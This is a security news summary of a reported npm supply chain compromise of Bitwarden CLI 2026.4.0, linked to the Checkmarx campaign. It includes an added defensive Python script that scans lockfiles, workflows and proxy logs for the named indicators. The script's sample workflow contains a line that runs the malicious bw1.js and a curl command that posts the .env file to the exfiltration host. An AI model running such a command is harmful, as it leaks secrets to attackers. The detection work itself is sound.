Bitwarden CLI Breach Ties to Checkmarx Supply Chain Campaign

TL;DR Summary
Bitwarden CLI version 2026.4.0 was compromised: a malicious bw1.js was distributed through npm as part of the Checkmarx supply chain campaign. The attackers used a compromised GitHub Action in Bitwarden's CI/CD pipeline to steal tokens, secrets and credentials and exfiltrate them to audit.checkmarx.cx, with a GitHub repository as a fallback channel. The malware can also inject malicious workflows to harvest secrets across downstream pipelines. Bitwarden says no end-user vault data was accessed, the issue was contained, and the affected release has been deprecated. The incident is linked to TeamPCP and related to the Shai-Hulud activity; a CVE will be issued for this release.
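The summary names three concrete indicators: the deprecated release 2026.4.0, the malicious file bw1.js, and the exfiltration host audit.checkmarx.cx. The script below is an added example, not code from The Hacker News, Bitwarden or Checkmarx, showing how a practitioner would sweep lockfiles, workflow files and proxy logs for those indicators offline. It assumes the Bitwarden CLI's npm package name is @bitwarden/cli and uses npm's documented lockfile layouts (lockfileVersion 1 and 2/3); the lockfiles, workflow and proxy log lines are constructed for the demonstration and do not reproduce the actual malicious workflow.

```python
"""Offline IOC sweep for the Bitwarden CLI 2026.4.0 indicators (added example)."""
import json
import re

AFFECTED_PACKAGE = "@bitwarden/cli"   # assumption: npm name of the Bitwarden CLI
AFFECTED_VERSION = "2026.4.0"         # release the summary says was compromised
MALICIOUS_FILE = "bw1.js"             # malicious file named in the summary
EXFIL_HOST = "audit.checkmarx.cx"     # exfiltration host named in the summary

IOC_PATTERNS = {
    # Match bw1.js as a whole file name (not e.g. "xbw1.js" or "bw1.jsx").
    "malicious_file": re.compile(r"(?<![\w.-])" + re.escape(MALICIOUS_FILE) + r"(?![\w-])"),
    "exfil_host": re.compile(re.escape(EXFIL_HOST), re.IGNORECASE),
}


def lockfile_hits(lock_text: str) -> list[str]:
    """Return install paths where the affected package is pinned at the affected version."""
    lock = json.loads(lock_text)
    hits: list[str] = []
    # lockfileVersion 2/3: "packages" keyed by install path, e.g. node_modules/@bitwarden/cli
    for path, entry in lock.get("packages", {}).items():
        if "node_modules/" not in path:
            continue  # the "" key is the root project itself
        name = path.rsplit("node_modules/", 1)[1]   # keeps the @scope/ prefix
        if name == AFFECTED_PACKAGE and entry.get("version") == AFFECTED_VERSION:
            hits.append(path)

    # lockfileVersion 1: "dependencies" keyed by name, nested for non-hoisted deps
    def walk(deps: dict, chain: str) -> None:
        for name, entry in deps.items():
            label = f"{chain} > {name}" if chain else name
            if name == AFFECTED_PACKAGE and entry.get("version") == AFFECTED_VERSION:
                hits.append(label)
            walk(entry.get("dependencies", {}), label)

    walk(lock.get("dependencies", {}), "")
    return hits


def text_iocs(text: str) -> dict[str, list[int]]:
    """Map IOC name -> 1-based line numbers on which it appears in free text."""
    found: dict[str, list[int]] = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        for ioc, pattern in IOC_PATTERNS.items():
            if pattern.search(line):
                found.setdefault(ioc, []).append(lineno)
    return found


# --- constructed sample inputs (not real artefacts from the incident) ---
SAMPLE_LOCK_V3 = json.dumps({
    "name": "release-tooling", "lockfileVersion": 3,
    "packages": {
        "": {"name": "release-tooling", "dependencies": {"@bitwarden/cli": "2026.4.0"}},
        "node_modules/@bitwarden/cli": {"version": "2026.4.0"},
        "node_modules/semver": {"version": "7.6.0"},
    },
})
SAMPLE_LOCK_V1 = json.dumps({
    "lockfileVersion": 1,
    "dependencies": {
        "release-helper": {"version": "1.0.0",
                           "dependencies": {"@bitwarden/cli": {"version": "2026.4.0"}}},
        "semver": {"version": "7.6.0"},
    },
})
SAMPLE_WORKFLOW = "\n".join([
    "name: release",
    "on: [push]",
    "jobs:",
    "  build:",
    "    runs-on: ubuntu-latest",
    "    steps:",
    "      - uses: actions/checkout@v4",
    "      - run: npm ci",
    "      - run: node node_modules/@bitwarden/cli/bw1.js",      # line 9
    "      - run: curl -sS https://audit.checkmarx.cx/ -d @.env",  # line 10
])
SAMPLE_PROXY_LOG = "\n".join([
    "10.0.0.5 - CONNECT registry.npmjs.org:443 200",
    "10.0.0.5 - CONNECT audit.checkmarx.cx:443 200",             # line 2
    "10.0.0.5 - CONNECT api.github.com:443 200",
])


def sweep() -> list[str]:
    """Run every check over the constructed samples and return human-readable findings."""
    findings: list[str] = []
    for label, lock in (("v3 lockfile", SAMPLE_LOCK_V3), ("v1 lockfile", SAMPLE_LOCK_V1)):
        for hit in lockfile_hits(lock):
            findings.append(f"{label}: {AFFECTED_PACKAGE}@{AFFECTED_VERSION} at {hit}")
    for label, text in (("workflow", SAMPLE_WORKFLOW), ("proxy log", SAMPLE_PROXY_LOG)):
        for ioc, lines in text_iocs(text).items():
            findings.append(f"{label}: {ioc} on line(s) {lines}")
    return findings


if __name__ == "__main__":
    for finding in sweep():
        print(finding)
```

Point lockfile_hits at every package-lock.json in your repositories and text_iocs at workflow files, build logs and egress proxy logs; a hit on the host in egress logs is the signal that secrets may already have left the pipeline, so treat it as a credential-rotation trigger rather than just a cleanup item.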
- Bitwarden CLI Compromised in Ongoing Checkmarx Supply Chain Campaign (The Hacker News)
- CanisterSprawl: pgserve Compromised on npm: Malicious Versions Harvest Credentials and Exfiltrate to a Decentralized ICP Canister (StepSecurity)
- New npm supply-chain attack self-spreads to steal auth tokens (BleepingComputer)
- Another npm supply chain worm is tearing through dev environments (The Register)
- No Off Season: Three Supply Chain Campaigns Hit npm, PyPI, and Docker Hub in 48 Hours (GitGuardian Blog)
Want the full story? Read the original article on The Hacker News.